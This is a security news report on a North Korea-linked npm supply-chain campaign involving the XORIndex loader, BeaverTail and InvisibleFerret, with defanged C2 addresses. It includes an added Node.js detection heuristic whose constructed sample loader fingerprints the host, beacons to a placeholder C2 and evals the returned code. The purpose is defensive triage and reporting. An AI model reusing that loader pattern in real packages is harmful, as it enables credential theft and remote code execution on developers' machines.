A newly identified wave of malicious software supply chain activity linked to North Korea has infiltrated the popular JavaScript package ecosystem npm, targeting developers worldwide.
The campaign, uncovered by Socket’s Threat Research Team, centers around a stealthy new malware loader dubbed XORIndex and marks a dangerous evolution of previous attacks involving the HexEval Loader.
In total, 67 malicious npm packages were deployed, with 28 containing the XORIndex Loader and 39 tied to the ongoing HexEval campaign.
Combined, these packages have accumulated over 17,000 downloads, with 27 packages still active at the time of reporting.
XORIndex – A New Obfuscated Malware Loader
The XORIndex Loader is named for its use of XOR-based string obfuscation and index-based code hiding, allowing it to evade conventional security scans.
Upon installation of a malicious npm package, such as the still-live eth-auditlog, vite-meta-plugin, or cronek, the loader performs host reconnaissance, collecting details such as:
- Hostname
- Current username
- Operating system
- External IP address
- Basic geolocation
The collected data is exfiltrated to a command-and-control (C2) endpoint such as https://log-writter[.]vercel[.]app/api/ipcheck, hosted on Vercel.

The malware then passes whatever JavaScript the C2 server returns to eval(), activating a chain of execution that downloads and runs the second-stage malware known as BeaverTail.
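As an added example (not code from Socket or from the page), a small Node.js triage heuristic that flags an npm package whose install-time script shows the combination of behaviours described above: an install hook, XOR-style string decoding, host reconnaissance, an outbound beacon, and eval() of the response. The package contents, file names and C2 hostname are constructed placeholders, not real indicators.

```javascript
// Added example: heuristic triage of an npm package for XORIndex-style loader behaviour.
// Input is an object mapping file paths to source text (assumption: caller extracts the tarball).
const INDICATORS = [
  { id: "install-hook", weight: 2, test: (f, s) => f === "package.json" && /"(pre|post)install"\s*:/.test(s) },
  { id: "host-recon", weight: 2, test: (f, s) => /os\.(hostname|userInfo|platform)\s*\(/.test(s) },
  { id: "xor-string-decode", weight: 3, test: (f, s) => /charCodeAt\([^)]*\)\s*\^/.test(s) },
  { id: "outbound-beacon", weight: 2, test: (f, s) => /\b(fetch|axios\.(get|post)|https?\.request)\s*\(/.test(s) },
  { id: "eval-remote-code", weight: 4, test: (f, s) => /\beval\s*\(\s*(await\s+)?[\w.]*(text|data|body)\b/.test(s) },
];

// Score every indicator once per package; the combination, not any single hit, drives the verdict.
function triagePackage(files) {
  const hits = new Set();
  for (const [path, src] of Object.entries(files)) {
    for (const ind of INDICATORS) if (ind.test(path, src)) hits.add(ind.id);
  }
  const score = [...hits].reduce((n, id) => n + INDICATORS.find((i) => i.id === id).weight, 0);
  const verdict = score >= 7 ? "block" : score >= 3 ? "review" : "allow";
  return { score, hits: [...hits].sort(), verdict };
}

// Constructed sample mimicking the described loader: postinstall hook, XOR decoder,
// host fingerprint, beacon to a placeholder C2, eval() of the returned body.
const SUSPECT = {
  "package.json": '{"name":"example-pkg","scripts":{"postinstall":"node setup.js"}}',
  "setup.js": `
const os = require("os");
const k = 0x5a;
const dec = (s) => s.split("").map((c) => String.fromCharCode(c.charCodeAt(0) ^ k)).join("");
const info = { host: os.hostname(), user: os.userInfo().username, platform: os.platform() };
fetch("https://c2.invalid/api/ipcheck", { method: "POST", body: JSON.stringify(info) })
  .then((r) => r.text()).then((body) => eval(body));
`,
};

// Constructed benign package with no install hook and no network or eval use.
const BENIGN = {
  "package.json": '{"name":"pad-left-ish","scripts":{"test":"node test.js"}}',
  "index.js": "module.exports = (s, n) => s.padStart(n);",
};

console.log(triagePackage(SUSPECT)); // verdict "block", score 13
console.log(triagePackage(BENIGN));  // verdict "allow", score 0
```

A real deployment would run this over every package in a lockfile before `npm install` executes lifecycle scripts, or simply install with `--ignore-scripts` and review flagged packages by hand.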
BeaverTail & InvisibleFerret – Full-Scale Credential Theft
Once executed, BeaverTail scans nearly 50 wallet and browser extension locations, collecting sensitive data related to cryptocurrencies.
It targets platforms including MetaMask, Phantom, TronLink, Solana CLI, and even macOS keychains. Data is compressed into an archive and sent to hardcoded exfiltration servers like http://144[.]217[.]86[.]88/uploads.
From there, BeaverTail attempts to fetch and inject a third-stage malware known as InvisibleFerret, which enables remote access, command execution, and long-term persistence on compromised systems, posing a particularly significant threat to developers and cryptocurrency users.
Ongoing Supply Chain Threats
This attack is part of a wider North Korean espionage and theft campaign known as Contagious Interview, targeting developers, job seekers, and cryptocurrency holders.
Both the XORIndex and HexEval campaigns show signs of rapid iteration: the threat actors rotate npm aliases, host C2 endpoints on legitimate cloud infrastructure, and layer on sophisticated obfuscation.
Security teams are advised to monitor package installation behaviors and integrate tools such as the Socket GitHub App, CLI, and browser extension to detect suspicious dependencies before they reach production environments.
A complete list of compromised packages, npm aliases, and C2 infrastructure has been published by Socket to aid in threat detection and mitigation.